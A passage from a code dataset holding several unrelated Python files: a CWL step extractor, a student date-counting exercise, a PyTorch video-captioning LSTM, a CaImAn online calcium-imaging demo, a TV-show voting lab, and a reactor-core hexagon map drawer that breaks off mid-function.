json\nsys.stdout.flush()\nf=\"./data/test_cwl.json\"\n\ndef main():\n loop_cwl(f)\n\ndef write_run_section(run_sec):\n outf='./data/'+str(run_sec['id']).replace('#', '')+'.json'\n with open(outf, 'w') as OUTF:\n json.dump(run_sec, OUTF,indent=3)\n\ndef loop_cwl(cwl_f):\n with open(cwl_f) as F:\n cwlobj=json.load(F)\n for k, v in cwlobj.items():\n if(k==\"steps\"):\n for i in range(len(v)):\n write_run_section(v[i])\n\nif __name__ == '__main__':\n main()\n","sub_path":"extrac_run_from_cwl.json.py","file_name":"extrac_run_from_cwl.json.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"183234215","text":"\r\n\r\ndef get_day(month):\r\n if month==1:return 31\r\n elif month == 2 : \r\n if year%4==0:\r\n if year%100==0:\r\n if year%400==0:\r\n return 29\r\n \r\n else: return 28\r\n elif month == 3 : return 31\r\n elif month == 4 : return 30\r\n elif month == 5 : return 31\r\n elif month == 6 : return 30\r\n elif month == 7 : return 31\r\n elif month == 8 : return 31\r\n elif month == 9 : return 30\r\n elif month == 10 : return 31\r\n elif month == 11 : return 30\r\n elif month == 12 : return 31\r\n\r\nt = int(input(\"Number of test cases : \"))\r\n\r\nwhile t>=1:\r\n \r\n date = input(\"Enter in format yyyy:mm:dd : \")\r\n date = date.split(\":\")\r\n year = int(date[0])\r\n month = int(date[1])\r\n day_of_med = int(date[2])\r\n no_of_days=0\r\n med_count=0\r\n \r\n while True:\r\n till_day = get_day(month)\r\n print(till_day)\r\n cur_day=0\r\n for i in range(day_of_med, till_day+1 ,2):\r\n cur_day=i\r\n med_count+=1\r\n \r\n if day_of_med%2==0:\r\n day_of_med=2\r\n if month!=12:\r\n month+=1\r\n else:\r\n month=1\r\n \r\n if(2+(till_day-cur_day)==2):\r\n pass\r\n else:\r\n break;\r\n else:\r\n day_of_med=1\r\n if month!=12:\r\n month+=1\r\n else:\r\n month=1\r\n \r\n if(1+(till_day-cur_day)==2):\r\n pass\r\n else:\r\n break;\r\n \r\n print(med_count)\r\n t-=1 \r\n \r\n \r\n \r\n \r\n ","sub_path":"When_to_take_medicine.py","file_name":"When_to_take_medicine.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"435256306","text":"import torch\r\nimport torch.nn.functional as F\r\nimport json\r\nimport videoLoader as vL\r\nimport dictBuilder as dB\r\nimport myData\r\n\r\nuse_gpu = torch.cuda.is_available()\r\n# global embed_\r\nembed_ = torch.nn.Embedding(3000, 256)\r\nembed_.load_state_dict(torch.load('./models/embed_.pth'))\r\n\r\nclass MyLSTM_1(torch.nn.Module):\r\n def __init__(self):\r\n # global embed_\r\n super(MyLSTM_1, self).__init__()\r\n self.conv1 = torch.nn.Conv2d(3, 12, 5, padding=2)\r\n self.pool1 = torch.nn.MaxPool2d(2)\r\n self.conv2 = torch.nn.Conv2d(12, 48, 3, padding=1)\r\n self.pool2 = torch.nn.MaxPool2d(4)\r\n self.line1 = torch.nn.Linear(49152, 4096)\r\n\r\n self.lstm1 = torch.nn.LSTM(4096, 256)\r\n # self.lstm2 = torch.nn.LSTM(49152, 256)\r\n self.lstmc1 = torch.nn.LSTMCell(256, 256)\r\n self.lstmc2 = torch.nn.LSTMCell(256, 256)\r\n self.hidden_cell1 = (torch.zeros(1, 1, 256), torch.zeros((1, 1, 256)))\r\n self.hidden_cell2 = (torch.zeros(1, 1, 256), torch.zeros((1, 1, 256)))\r\n # self.line2 = torch.nn.Linear(1024, 256)\r\n\r\n # self.embed = torch.nn.Embedding(3000, 256)\r\n\r\n def forward(self, video):\r\n # global embed_\r\n if use_gpu:\r\n embed = embed_.cuda()\r\n else:\r\n embed = embed_\r\n #each video contains 10 cap frames, thus batch = 10\r\n out = F.relu(self.conv1(video)) # size() = (10, 3, 256, 256)\r\n out = self.pool1(out)\r\n out = F.relu(self.conv2(out))\r\n out = self.pool2(out)\r\n out = out.view(out.size()[0], -1)\r\n out = F.relu(self.line1(out))\r\n\r\n # t = out.transpose(0, 1)\r\n out = out.unsqueeze(1) # size() = (10, 1, 512)\r\n # print(out.size())\r\n\r\n #\"\"\"\r\n if use_gpu:\r\n h, c0 = self.hidden_cell1[0].cuda(), self.hidden_cell1[1].cuda()\r\n else:\r\n h, c0 = self.hidden_cell1[0], self.hidden_cell1[1]\r\n out, (h, c0) = self.lstm1(out, (h, c0))\r\n # out, (h, c) = self.lstm2(out, h)\r\n\r\n # print(out.size(), h.size())\r\n # 10, 1, 256\r\n temp = torch.LongTensor([3000-1])\r\n\r\n coll = torch.zeros(18, 256)\r\n c1 = torch.zeros(1, 256)\r\n if use_gpu:\r\n temp, coll, c1 = temp.cuda(), coll.cuda(), c1.cuda()\r\n temp = embed(temp)\r\n h = h[0]\r\n for i in range(10):\r\n # print(out[i].size(), temp.size(), c1.size())\r\n temp, c1 = self.lstmc1(out[i], (temp, c1))\r\n h = temp\r\n temp = torch.zeros(1).long()\r\n if use_gpu:\r\n temp = temp.cuda()\r\n temp = embed(temp) #\r\n for i in range(18):\r\n temp, c1 = self.lstmc2(temp, (h, c1))\r\n coll[i] = temp\r\n\r\n \"\"\" \r\n h, c0 = self.hidden_cell1[0], self.hidden_cell1[1]\r\n h, c0, c1 = (h[0], c0[0], c0[0])\r\n h1 = torch.zeros(1, 256)\r\n coll = torch.zeros(18, 256)\r\n padding = torch.LongTensor([3000-1])\r\n if use_gpu:\r\n h, c0, h1, c1, coll, padding = h.cuda(), c0.cuda(), h1.cuda(), c1.cuda(), coll.cuda(), padding.cuda()\r\n padding = embed(padding)\r\n for i in range(5):\r\n # print(out.size(), h.size(), c0.size(), padding.size(), h.size(), c1.size())\r\n h, c0 = self.lstmc2(out[i], (h, c0))\r\n h1, c1 = self.lstmc1(padding, (h, c1))\r\n h1 = torch.LongTensor([0])\r\n if use_gpu:\r\n h1 = h1.cuda()\r\n h1 = embed(h1)\r\n\r\n for i in range(18):\r\n h, c0 = self.lstmc2(out[i%10], (h, c0)) # how to do padding for frame input?\r\n h1, c1 = self.lstmc1(h1, (h, c1))\r\n coll[i] = h1\r\n \"\"\"\r\n # ret = torch.zeros(18)\r\n # for i in range(18):\r\n # dist = torch.norm(self.embed.weight.data - coll[i], dim=1)\r\n # ret[i] = torch.argmin(dist)\r\n # return ret\r\n\r\n return coll # (18, 256)\r\n\r\n\r\ndef train(num_epoch, videofile, labelfile, savepath='./models/all_states.pth'):\r\n # global embed_\r\n if use_gpu:\r\n embed = embed_.cuda()\r\n else:\r\n embed = embed_\r\n # frozen_list = ['embed']\r\n dataset = myData.myData(videofile, labelfile)\r\n dataloader = torch.utils.data.DataLoader(dataset, batch_size=1, shuffle=True)\r\n\r\n # dictfile = json.load(open(dictfile), 'r')\r\n model = MyLSTM_1()\r\n try:\r\n saved = torch.load(savepath)\r\n model.load_state_dict(saved[\"net\"])\r\n\r\n except:\r\n saved = False\r\n print(\"No existing model found\")\r\n print(\"Starting a new model\")\r\n\r\n # for name, value in model.named_parameters():\r\n # if name in frozen_list:\r\n # value.requires_grad = False\r\n # params = filter(lambda p: p.requires_grad, model.parameters())\r\n loss_fn = torch.nn.MSELoss()\r\n # optimizer = torch.optim.Adam(params, lr=0.001)\r\n optimizer = torch.optim.Adam(model.parameters(), lr=0.001)\r\n\r\n if use_gpu:\r\n model = model.cuda()\r\n loss_fn = loss_fn.cuda()\r\n\r\n for t in range(num_epoch):\r\n print(\"Current epoch:\", t)\r\n count = 0\r\n for i, data in enumerate(dataloader, 0):\r\n count += 1\r\n inputs, labels = data\r\n # if count%10 == 0:\r\n # print(inputs.size(), labels)\r\n if use_gpu:\r\n inputs, labels = inputs.cuda(), labels.cuda()\r\n\r\n optimizer.zero_grad()\r\n outputs = model(inputs[0])\r\n labels = labels.long()\r\n\r\n labels = embed(labels[0].long())\r\n # labels = labels[0]\r\n #print(outputs.size(), labels.size())\r\n loss = loss_fn(outputs, labels)\r\n if count % 50 == 0:\r\n print(\"count = %s, loss = %s\"%(count,loss))\r\n loss.backward()\r\n optimizer.step()\r\n\r\n if t % 5 == 0:\r\n all_states = {\"net\": model.state_dict(), \"opt\": optimizer, \"epoch\": t}\r\n torch.save(obj=all_states, f=savepath)\r\n\r\n all_states = {\"net\": model.state_dict(), \"opt\": optimizer, \"epoch\": t}\r\n torch.save(obj=all_states, f=savepath)\r\n return all_states\r\n\r\n\r\ndef testing(testsetpath, dictpath, modelpath, outputpath):\r\n global use_gpu\r\n use_gpu = False\r\n embed = embed_\r\n # \"./MLDS_hw2_1_data/testing_data/\", \"temp.json\", \"./models/0.pth\", \"./MLDS_hw2_1_data/pred.txt\"\r\n videos = dict()\r\n fp = open(testsetpath + \"id.txt\", 'r')\r\n videopath = testsetpath + \"video/\"\r\n for line in fp:\r\n if line.endswith('\\n'):\r\n templine = line[:len(line) - 1]\r\n else:\r\n templine = line\r\n videos[templine] = vL.video_2_matrix(videopath, templine)\r\n fp.close()\r\n\r\n model = MyLSTM_1()\r\n try:\r\n saved = torch.load(modelpath)\r\n model.load_state_dict(saved[\"net\"])\r\n for name, paras in model.named_parameters():\r\n print(name, paras)\r\n except:\r\n print(\"model not found!\")\r\n return False\r\n\r\n preds = dict()\r\n words = json.load(open(dictpath, 'r'))\r\n words_re = dict()\r\n words_re[3000 - 1] = ''\r\n words_re[3000 - 2] = ''\r\n words_re[0] = ''\r\n words_re[1] = ''\r\n for word in words.keys():\r\n words_re[words[word]] = word\r\n\r\n out = dict()\r\n for video in videos.keys():\r\n preds[video] = model(torch.Tensor(videos[video]))\r\n one_hots = torch.zeros(18)\r\n sent = list()\r\n for i in range(18):\r\n dist = torch.norm(embed.weight.data - preds[video][i], dim=1)\r\n one_hots[i] = torch.argmin(dist)\r\n if int(one_hots[i]) in words_re.keys():\r\n sent.append(words_re[int(one_hots[i])])\r\n else:\r\n sent.append(\"\")\r\n out[video] = \"\"\r\n for word in sent:\r\n if (word == \"\") or word == \"\":\r\n continue\r\n if word == \"\":\r\n break\r\n out[video] = out[video] + ' ' + word\r\n\r\n fp = open(outputpath, 'w')\r\n for video in out.keys():\r\n print(video, out[video], file=fp)\r\n fp.close()\r\n use_gpu = torch.cuda.is_available()\r\n return out\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # c = 1450\r\n comm = \"train\"\r\n if comm == \"train\":\r\n cl = (100, 200, 300, 400, 500, 600, 700, 800, 900, 1000, 1100, 1200, 1300, 1400, 1450)\r\n for i in range(10):\r\n for c in cl:\r\n print(\"Current c =\", c)\r\n videofile = \"%straining.json\"%c\r\n labelfile = \"./MLDS_hw2_1_data/training_vec.json\"\r\n states = train(2, videofile, labelfile, savepath='./models/all_states_4.pth')\r\n torch.save(obj=states, f='./models/4_%s.pth'%i)\r\n if comm == \"test\":\r\n testing(\"./MLDS_hw2_1_data/testing_data/\", \"temp.json\", \"./models/4_0.pth\", \"./MLDS_hw2_1_data/pred_4.txt\")","sub_path":"HW2/LSTM.py","file_name":"LSTM.py","file_ext":"py","file_size_in_byte":8833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"52279823","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n/** \n * The DEMO script implements streaming image analysis part of the closed-loop system between MicroManager \n * and CaImAn toolbox (python). Two processes are communicating through named pipes, which are used for \n * sending signals that trigger specific processing steps in both environments. Images that are acquired \n * during the recording are saved in a multiTIFF file which is in turn read by CaImAn and used for online \n * analysis.\n * \n * author: Tea Tompos (master's internship project, June 2020)\n */\n\n\"\"\"\n\n# %% ********* Importing packages: *********\nimport sys\nimport caiman as cm\nimport logging\nfrom pytictoc import TicToc\nfrom caiman.source_extraction.cnmf import params as params\nfrom caiman.source_extraction import cnmf as cnmf\nimport os\nfrom caiman.paths import caiman_datadir\n\n# %% ********* Creating named pipes for communication with MicroManager: *********\ntimer = TicToc()\ntimer.tic() # start measuring time\n\n# sendPipeName = \"/tmp/getPipeMMCaImAn.ser\"\t # FOR SENDING MESSAGES --> TO MicroManager\n# receivePipeName = \"/tmp/sendPipeMMCaImAn.ser\" # FOR READING MESSAGES --> FROM MicroManager\n\n# MMfileDirectory = '/Applications/MicroManager 2.0 gamma/uMresults'\nCaimanFileDirectory = caiman_datadir() # specify where the file is saved \n\n\n# if os.path.exists(sendPipeName):\n# os.remove(sendPipeName)\n# os.mkfifo(sendPipeName)\n# print (\"Removed old write-pipe, created new write-pipe.\")\n# else: \n# os.mkfifo(sendPipeName)\n# print (\"Write-pipe created sucessfully!\")\n \n# if os.path.exists(receivePipeName):\n# os.remove(receivePipeName)\n# os.mkfifo(receivePipeName)\n# print (\"Removed old read-pipe, created new read-pipe.\")\n# else: \n# os.mkfifo(receivePipeName)\n# print (\"Read-pipe created sucessfully!\")\n \n# timer.toc()\n# # %% ********* Wait for file name: *********\n# print(\"Waiting for file name..\")\n# pipeRead = open(receivePipeName, 'r') # open the read pipe\n# getFileName = pipeRead.readline()[:-1] # wait for message\n\n# fullFileName = getFileName + '_MMStack_Default.ome.tif'\n# # fileToProcess = os.path.join(CaimanFileDirectory, 'example_movies', getFileName, fullFileName) # join downstream folders\n\n# print(\"File name received: \" + fullFileName)\n# timer.toc()\n# %% ********* Defining parameters: *********\nprint(\"*** Defining analysis parameters ***\")\nfileToProcess = os.path.join(CaimanFileDirectory, 'demoCalciumRecording', 'demoCalciumRecording_MMStack_Default.ome.tif') # FOR TESTING PURPOSES\n\n\nfr = 40 # frame rate (Hz)\ndecay_time = .45 # approximate length of transient event in seconds (for GCaMP6s)\ngSig = (26, 26) # gaussian width of a 2D gaussian kernel, which approximates a neuron\ngSiz = (120, 120) # average diameter of a neuron, in general 4*gSig+1\np = 1 # order of AR indicator dynamics \nmin_SNR = 0.2 # minimum SNR for accepting candidate components\nthresh_CNN_noisy = 0.65 # CNN threshold for candidate components\ngnb = 1 # number of background components\ninitMethod_online = 'bare' # initialization method ('cnmf' will save init_file.hdf5, 'bare' will not.. not sure why)\ndeconv_method = 'oasis'\n\n# set up CNMF initialization parameters\ninitFrames = 300 # number of frames for initialization\n# patch_size = 400 # size of patch\n# stride = 30 # amount of overlap between patches\nK = 1 # max number of components in each patch\nnew_K = 0\ncnnFlag = True\n\ninitialParamsDict = {'fr': fr,\n 'fnames': fileToProcess, # file used for initialization\n 'decay_time': decay_time,\n 'gSig': gSig,\n 'gSiz': gSiz,\n 'p': p,\n 'center_psf': False, # set true for 1p data processing\n 'simultaneously': True, # whether to demix and deconvolve simultaneously\n 'normalize': True, # whether to normalize each frame prior to online processing\n 'min_SNR': min_SNR,\n 'nb': gnb,\n 'init_batch': initFrames,\n 'init_method': initMethod_online,\n 'rf': None, # half-size of patch in pixels. If None, no patches are constructed and the whole FOV is processed jointly\n #'stride': stride,\n 'update_num_comps': False,\n 'motion_correct': False,\n 'sniper_mode': True, # whether to use the online CNN classifier for screening candidate components (otherwise space correlation is used)\n 'thresh_CNN_noisy': thresh_CNN_noisy,\n 'K': K,\n 'expected_comps': K,\n 'update_num_comps': False, # whether to search for new components\n 'min_num_trial': new_K,\n 'method_deconvolution': deconv_method,\n 'show_movie': True\n }\n\n\nallParams = params.CNMFParams(params_dict=initialParamsDict) # define parameters in the params.CNMFParams\ncaimanResults = cnmf.online_cnmf.OnACID(params=allParams) # pass parameters to caiman object\n\n\ntimer.toc()\n# %% ********* Wait for initialization trigger message from MicroManager: *********\nprint(\"Now waiting for MicroManager to capture \" + str(initFrames) + \" initialization frames..\")\n\nprint(\"*** Starting Initialization protocol with \" + initMethod_online + \" method ***\")\ncaimanResults.initialize_online() # initialize model\n \n \ntimer.toc()\n# %% ********* Visualize results of initialization: *********\nprint(\"Initialization finished. Choose threshold parameter to adjust accepted/rejected components!\")\nlogging.info('Number of components:' + str(caimanResults.estimates.A.shape[-1]))\nvisual = cm.load(fileToProcess, subindices=slice(0,500)).local_correlations(swap_dim=False)\n# caimanResults.estimates.plot_contours(img=visual)\n\n# ********* Use CNN clasifier to modify accepted/rejected components: *********\ncnnThresh = 0.00001 # change threshold for CNN classifier to modify accepted/rejected components\n\n# if true, pass through the CNN classifier with a low threshold (keeps clearer neuron shapes and excludes processes):\nif cnnFlag: \n allParams.set('quality', {'min_cnn_thr': cnnThresh})\n caimanResults.estimates.plot_contours(img=visual, idx=caimanResults.estimates.idx_components)\n caimanResults.estimates.evaluate_components_CNN(allParams)\n caimanResults.estimates.plot_contours(img=visual, idx=caimanResults.estimates.idx_components)\n \n\n# %% ********* Send message to MicroManager to trigger data streaming: ********* \n\n# input(\"Press Enter after the parameter is chosen...\") # pause for user to decide on parameters\n\n# triggerStream = \"startStreamAcquisition\\n\" # include new line at the end\n# pipeWrite = open(sendPipeName, 'w', 1) # write (1 is for activating line buffering)\n# pipeWrite.write(triggerStream) # write to pipe\n\nprint(\"CaImAn is ready for online analysis. Message was sent to MicroManager!\")\n\ntimer.toc()\n\n# %% monkeypatch fit_next() so we can acces deltaf/f0 values during online analysis\ndef monkeypatch(func):\n def wrapped(*args, **kwargs):\n result = func(*args, **kwargs)\n process_frame(args[0], args[1])\n return result\n return wrapped\n\ncnmf.online_cnmf.OnACID.fit_next = monkeypatch(cnmf.online_cnmf.OnACID.fit_next) # replace the class function\n\ndef process_frame(results, t):\n print(t, results.estimates.C_on[0, t])\n deltaf = results.estimates.C_on[0][-1] # last value in estimates.C_on should be deltaf/f0 for last processed frame\n print(deltaf) # this should be pushed to StdpC (instead of print), but values are not correct \n \n# %% ********* Wait for streaming analysis trigger message from MicroManager: ********* \nprint(\"Waiting for MicroManager to start recording..\")\n\n\n# ********* Start online analysis if the message is right: *********\nif K==1: #triggerMessage_analyse == expectedMessage_analyse:\n print(\"*** Starting online analysis with OnACID algorithm ***\")\n caimanResults.fit_online() # online analysis\nelse:\n print(\"*** WARNING *** ONLINE ANALYSIS FAILED ***\")\n #print(\"Wrong cue message. Received: \" + triggerMessage_analyse + \" of type: \" + str(type(triggerMessage_analyse)) +\n # \"Expected: \" + expectedMessage_analyse + \" of type: \" + str(type(expectedMessage_analyse)))\n while True:\n sys.exit()\n\n \n# %% \ncaimanResults.estimates.view_components(img=visual, idx=caimanResults.estimates.idx_components)\n \n# %% TO DO:\n # get output from fit_online()\n # pass the values to stdpc\n\n# os.remove(sendPipeName)\n# os.remove(receivePipeName)\n\n\n\n\n\n","sub_path":"demos/AnalysisDemo.py","file_name":"AnalysisDemo.py","file_ext":"py","file_size_in_byte":8729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"248116304","text":"#File: tv_shows.py\n#Author: Austin Bailey\n#Date: 3/22/2016\n#Section: 10\n#E-mail: baustin1@umbc.edu\n#Description: Program will help people decide what tv to watch.\ndef voteSystem(listOfShows):\n print(\"You and your friends are voting on a show to watch.\")\n print(\"Which show would you like to vote for?\")\n check = 1\n voteList = [0] * len(listOfShows)\n while (check != 0):\n vote = int(input(\"Enter '0' to stop voting: \"))\n if ((vote <= 7) or (vote >= 0)):\n if (vote == 0):\n check -= 1\n else:\n voteList[vote - 1] += 1\n else:\n check = 1\n return voteList\ndef main():\n shows = [\"Daredevil\", \"Fargo\", \"Limitless\", \"Elementary\", \"Brooklyn 99\", \"Empire\", \"Supergirl\"]\n lengthOfList = len(shows)\n count = 1\n for g in range(0, lengthOfList):\n print(count, \"-\", shows[g])\n count += 1\n amountOfVotes = voteSystem(shows)\n print(\"Here are the final votes: \")\n for h in range(0, lengthOfList):\n print(shows[h], \"has\", amountOfVotes[h], \"votes.\")\nmain()\n \n","sub_path":"Labs/lab6/tv_shows.py","file_name":"tv_shows.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"147901307","text":"# -*- coding: utf-8 -*-\r\n#\r\n# draws a 360 deg. map read from file\r\nfrom PIL import Image, ImageDraw, ImageFont\r\n#\r\nmm = 3.7795 #1mm~3.7795 pxl\r\n# fonts setup\r\nisocp = 'isocpeui.ttf'\r\nfont = ImageFont.truetype(isocp,26)\r\nfont_legend = ImageFont.truetype(isocp,41)\r\nfont_lesser = ImageFont.truetype(isocp,45)\r\nfont_large = ImageFont.truetype(isocp,40)\r\n# image dimensions\r\nfield_x = 770*mm\r\nfield_y = 700*mm\r\nside = 30*mm # hexagon side length\r\nbottom_left = (270*mm, 630*mm) # coordinates of the top point of the bottom left cell\r\nimage = Image.new(\"RGB\", (int(field_x),int(field_y)), (255,255,255,255))\r\ndraw = ImageDraw.Draw(image)\r\n#\r\n###########################################################\r\n# \r\n###########################################################\r\n# legend\r\nleg_str1 = \"БИПР\"\r\nleg_str2 = \"Voyage\"\r\nleg_str3 = \"DYN3D\"\r\nleg_str4 = \"Арена\"\r\n# output filename\r\noutput_fn = \"output.png\"\r\n# input filenames\r\ninput_fn1 = \"1.txt\"\r\ninput_fn2 = \"2.txt\"\r\ninput_fn3 = \"3.txt\"\r\ninput_fn4 = \"4.txt\"\r\ninput_fn5 = '5.txt'\r\nyears = 'years.txt'\r\n##########################################################\r\n# \r\n##########################################################\r\nrows_south = [10,11,12,13,14] #cells in row (bottom half)\r\nrows_north = [13,12,11,10,9] #cells in row (top half)\r\n#\r\n# calculation of a single cell points coordinates from side and top point\r\ndef single_hex(start,side):\r\n coordinates = []\r\n coordinates.append(start) # starts from the top point and goes clockwise\r\n coordinates.append(tuple([start[0]+(((side**2)-(0.5*side)**2)**0.5), start[1]+0.5*side]))\r\n coordinates.append(tuple([start[0]+(((side**2)-(0.5*side)**2)**0.5), start[1]+1.5*side]))\r\n coordinates.append(tuple([start[0], start[1]+2*side]))\r\n coordinates.append(tuple([start[0]-(((side**2)-(0.5*side)**2)**0.5), start[1]+1.5*side]))\r\n coordinates.append(tuple([start[0]-(((side**2)-(0.5*side)**2)**0.5), start[1]+0.5*side]))\r\n return coordinates\r\n#\r\n# calculation of top points for 163 cells\r\ndef startpoints(bottom_left, side):\r\n half_width = ((side**2)-(0.5*side)**2)**0.5\r\n starts = []\r\n starts.append(bottom_left)\r\n for i in range(5):\r\n starts.append(tuple([bottom_left[0]+2*(i+1)*half_width, bottom_left[1]]))\r\n starts.append(tuple([bottom_left[0]-3*half_width, bottom_left[1]-1.5*side]))\r\n localstart = tuple([bottom_left[0]-3*half_width, bottom_left[1]-1.5*side])\r\n for i in range(8):\r\n starts.append(tuple([(bottom_left[0]-3*half_width)+2*(i+1)*half_width, bottom_left[1]-1.5*side]))\r\n for i in rows_south:\r\n localstart = tuple([localstart[0]-half_width, localstart[1]-1.5*side])\r\n starts.append(localstart)\r\n for j in range(i-1):\r\n starts.append(tuple([localstart[0]+2*(j+1)*half_width, localstart[1]]))\r\n starts.append(tuple([bottom_left[0]-7*half_width, bottom_left[1]-10.5*side]))\r\n for i in range(12):\r\n starts.append(tuple([bottom_left[0]-7*half_width+2*(i+1)*half_width, bottom_left[1]-10.5*side]))\r\n starts.append(tuple([bottom_left[0]-8*half_width, bottom_left[1]-12*side]))\r\n for i in range(13):\r\n starts.append(tuple([bottom_left[0]-8*half_width+2*(i+1)*half_width, bottom_left[1]-12*side]))\r\n localstart = tuple([bottom_left[0]-8*half_width, bottom_left[1]-12*side])\r\n for i in rows_north:\r\n localstart = tuple([localstart[0]+half_width, localstart[1]-1.5*side])\r\n starts.append(localstart)\r\n for j in range(i-1):\r\n starts.append(tuple([localstart[0]+2*(j+1)*half_width, localstart[1]]))\r\n starts.append(tuple([bottom_left[0], bottom_left[1]-21*side]))\r\n for i in range(5):\r\n starts.append(tuple([bottom_left[0]+2*(i+1)*half_width, bottom_left[1]-21*side]))\r\n return starts\r\ndef startpoints_leg(bottom_left, side):\r\n half_width = ((side**2)-(0.5*side)**2)**0.5\r\n starts = []\r\n starts.append(tuple([bottom_left[0]-1103, -1400+bottom_left[1]-8.5*half_width]))\r\n starts.append(tuple([bottom_left[0]-1103, -1400+bottom_left[1]-8.5*half_width+2.0*side]))\r\n starts.append(tuple([bottom_left[0]-1103, -1400+bottom_left[1]-8.5*half_width+2*2.0*side]))\r\n starts.append(tuple([bottom_left[0]-1103, -1400+bottom_left[1]-8.5*half_width+3*2.0*side]))\r\n return starts\r\n# assemble a list of all required coordinates for 163 cells\r\ndef hex_coordinates(starts):\r\n res = []\r\n for startpoint in starts:\r\n res.append(single_hex(startpoint, side))\r\n return res\r\n#\r\n# 10th cr bank marks\r\ndef cr_starts(starts):\r\n crstrt = []\r\n for i in [30,51,57,105,111,132]:\r\n crstrt.append(tuple([starts[i][0],starts[i][1]+2*mm]))\r\n return crstrt\r\n#\r\ndef cr_bank(starts):\r\n res = []\r\n for startpoint in starts:\r\n res.append(single_hex(startpoint, side-2*mm))\r\n return res\r\n#\r\n# calculation of text box coordinates for enumeration\r\ndef enumeration_startpoints(starts):\r\n x_indent = 6*mm\r\n y_indent = 4*mm\r\n enum_starts = []\r\n for startpoint in starts:\r\n enum_starts.append(tuple([startpoint[0]-x_indent, startpoint[1]+y_indent]))\r\n return enum_starts\r\n\r\n\r\n#\r\n# four left entries in a cell\r\ndef left_entries(starts):\r\n x_indent = 22*mm\r\n y_indent = 29*mm\r\n step = 10*mm\r\n entry1_starts, entry2_starts, entry3_starts, entry4_starts = [],[],[],[]\r\n for startpoint in starts:\r\n entry1_starts.append(tuple([startpoint[0]-x_indent, startpoint[1]+y_indent]))\r\n entry2_starts.append(tuple([startpoint[0]-x_indent, startpoint[1]+y_indent+step]))\r\n entry3_starts.append(tuple([startpoint[0]-x_indent, startpoint[1]+y_indent+2*step]))\r\n entry4_starts.append(tuple([startpoint[0]-x_indent, startpoint[1]+y_indent+3*step]))\r\n return [entry1_starts, entry2_starts, entry3_starts, entry4_starts]\r\n#\r\n# four right entries in a cell\r\ndef right_entries(starts):\r\n x_indent = 4*mm\r\n y_indent = 29*mm\r\n step = 10*mm\r\n entry1_starts, entry2_starts, entry3_starts, entry4_starts = [],[],[],[]\r\n for startpoint in starts:\r\n entry1_starts.append(tuple([startpoint[0]+x_indent, startpoint[1]+y_indent]))\r\n entry2_starts.append(tuple([startpoint[0]+x_indent, startpoint[1]+y_indent+step]))\r\n entry3_starts.append(tuple([startpoint[0]+x_indent, startpoint[1]+y_indent+2*step]))\r\n entry4_starts.append(tuple([startpoint[0]+x_indent, startpoint[1]+y_indent+3*step]))\r\n return [entry1_starts, entry2_starts, entry3_starts, entry4_starts]\r\n# four right entries in a cell\r\ndef center_entries(starts):\r\n x_indent = 12*mm\r\n y_indent = 15*mm\r\n step = 9*mm\r\n entry1_starts, entry2_starts, entry3_starts, entry4_starts = [],[],[],[]\r\n for startpoint in starts:\r\n entry1_starts.append(tuple([startpoint[0]-x_indent, startpoint[1]+y_indent]))\r\n entry2_starts.append(tuple([startpoint[0]-0.5*x_indent, startpoint[1]+1.2*y_indent+step]))\r\n entry3_starts.append(tuple([startpoint[0]-x_indent, startpoint[1]+1.2*y_indent+2*step]))\r\n entry4_starts.append(tuple([startpoint[0]-0.5*x_indent, startpoint[1]+1.3*y_indent+3*step]))\r\n return [entry1_starts, entry2_starts, entry3_starts, entry4_starts]\r\n\r\ndef center2_entries(starts):\r\n x_indent = 12*mm\r\n y_indent = 15*mm\r\n step = 13*mm\r\n entry1_starts, entry2_starts, entry3_starts, entry4_starts = [],[],[],[]\r\n for startpoint in starts:\r\n entry1_starts.append(tuple([startpoint[0]-x_indent, startpoint[1]+y_indent]))\r\n entry2_starts.append(tuple([startpoint[0]-0.5*x_indent, startpoint[1]+1.2*y_indent+step]))\r\n entry3_starts.append(tuple([startpoint[0]-x_indent, startpoint[1]+1.2*y_indent+2*step]))\r\n entry4_starts.append(tuple([startpoint[0]-0.5*x_indent, startpoint[1]+1.3*y_indent+3*step]))\r\n return [entry1_starts, entry2_starts, entry3_starts, entry4_starts]\r\n#\r\nshaded = [0,1,2,3,4,5,7,8,9,10,11,12,17,18,19,20,21,28,29,30,31,40,41,42,53,54,67,\r\n 81,82,83,84,85,86,87,96,97,98,99,100,101,110,111,112,113,114,123,124,125,126,135,136,137,146,147,156,\r\n 88,89,90,91,92,93,94,102,103,104,105,106,107,115,116,117,118,119,127,128,129,130,138,139,140,148,149]\r\n#\r\n\r\n# draw hexagonal cells\r\ndef cells_cr(coords):\r\n for coord_list in coords:\r\n draw.polygon(coord_list, outline='black')\r\ndef cells(coords, dev):\r\n years_cell=[]\r\n\r\n\r\n with open (years) as year:\r\n for line in year:\r\n years_cell.append(int(line))\r\n \r\n #red=hex(255)\r\n #green=hex(255/10)\r\n #print (red[2:])\r\n for i in range(len(dev)):\r\n red=int('{:3.0f}'.format(85*dev[i]))\r\n green=int('{:3.0f}'.format(-102*dev[i]+561))\r\n\r\n print (red, green, red+green)\r\n if int(red)>255:\r\n red=255\r\n elif red<0:\r\n red=0\r\n if int(green)<0:\r\n green=0\r\n elif int(green)>255:\r\n green=255\r\n r=hex(red)[2:]\r\n g=hex(green)[2:]\r\n\r\n if len(r)<2:\r\n r='0'+r\r\n if len(g)<2:\r\n g='0'+g\r\n draw.polygon(coords[i], outline='black', fill='#'+r+g+'00') \r\n #if dev[i]>5:\r\n # draw.polygon(coords[i], outline='black', fill='#'+r+g'00')\r\n #if dev[i]>2 and dev[i]<=5:\r\n # draw.polygon(coords[i], outline='black', fill='#ff9999')\r\n #if dev[i]>1 and dev[i]<=2:\r\n # draw.polygon(coords[i], outline='black', fill='#ffff66')\r\n #if dev[i]<=1 :\r\n # draw.polygon(coords[i], outline='black', fill='#66ff66')\r\n #else:\r\n # draw.polygon(coords[i], outline='black')\r\ndef 